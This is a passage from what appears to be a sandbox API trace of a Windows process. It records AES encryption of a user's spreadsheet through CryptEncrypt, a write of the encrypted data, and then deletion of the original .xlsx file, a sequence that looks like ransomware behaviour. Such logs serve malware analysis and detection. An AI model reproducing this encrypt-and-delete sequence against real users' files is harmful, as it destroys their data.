0x43cb3f0 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0083.179] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0083.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0083.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2cd0 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0083.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb390 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0083.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0083.180] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0468 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0083.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0083.180] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0083.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0083.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0468 | out: hHeap=0x1780000) returned 1 [0083.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.182] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0350 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0083.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0378 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0083.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0083.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3620 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0083.182] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0083.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2de0 [0083.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2de0 | out: hHeap=0x1780000) returned 1 [0083.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0083.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0083.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0083.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0378 | out: hHeap=0x1780000) returned 1 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0083.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0083.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02b0 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2e20 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ec0 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e20 | out: hHeap=0x1780000) returned 1 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ec0 | out: hHeap=0x1780000) returned 1 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02b0 | out: hHeap=0x1780000) returned 1 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0083.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0083.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0083.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ef0 | out: hHeap=0x1780000) returned 1 [0083.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0083.186] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2d20, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2d20*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0083.186] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.186] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3980, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.187] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x14a89, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0x14a90) returned 1 [0083.187] CharLowerBuffW (in: lpsz="byte[84625]", cchLength=0xb | out: lpsz="byte[84625]") returned 0xb [0083.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3de8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.188] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144de30*=0x14a89, dwBufLen=0x14a90 | out: pbData=0x48f0048*, pdwDataLen=0x144de30*=0x14a90) returned 1 [0083.189] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.192] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x14a90, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144e834*=0x14a90, lpOverlapped=0x0) returned 1 [0083.195] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0083.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43c36c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0083.195] CryptDestroyKey (hKey=0x41ac180) returned 1 [0083.195] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.195] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.195] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0083.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0083.196] CryptReleaseContext (hProv=0x41a4a58, dwFlags=0x0) returned 1 [0083.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.196] FreeLibrary (hLibModule=0x756e0000) returned 1 [0083.196] CloseHandle (hObject=0x298) returned 1 [0083.196] CloseHandle (hObject=0x258) returned 1 [0083.215] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx", lpFilePart=0x0) returned 0x53 [0083.215] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\ul2gt2lt.xlsx")) returned 0x20 [0083.215] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b95160, ftCreationTime.dwHighDateTime=0x1d5ea67, ftLastAccessTime.dwLowDateTime=0xe909a60, ftLastAccessTime.dwHighDateTime=0x1d5f008, ftLastWriteTime.dwLowDateTime=0xe909a60, ftLastWriteTime.dwHighDateTime=0x1d5f008, nFileSizeHigh=0x0, nFileSizeLow=0x14a89, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ul2gt2Lt.xlsx", cAlternateFileName="UL2GT2~1.XLS")) returned 0x41ac440 [0083.215] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\ul2gt2Lt.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\ul2gt2lt.xlsx")) returned 1 [0083.294] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2b95160, ftCreationTime.dwHighDateTime=0x1d5ea67, ftLastAccessTime.dwLowDateTime=0xe909a60, ftLastAccessTime.dwHighDateTime=0x1d5f008, ftLastWriteTime.dwLowDateTime=0xe909a60, ftLastWriteTime.dwHighDateTime=0x1d5f008, nFileSizeHigh=0x0, nFileSizeLow=0x14a89, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ul2gt2Lt.xlsx", cAlternateFileName="UL2GT2~1.XLS")) returned 0 [0083.295] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0083.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | 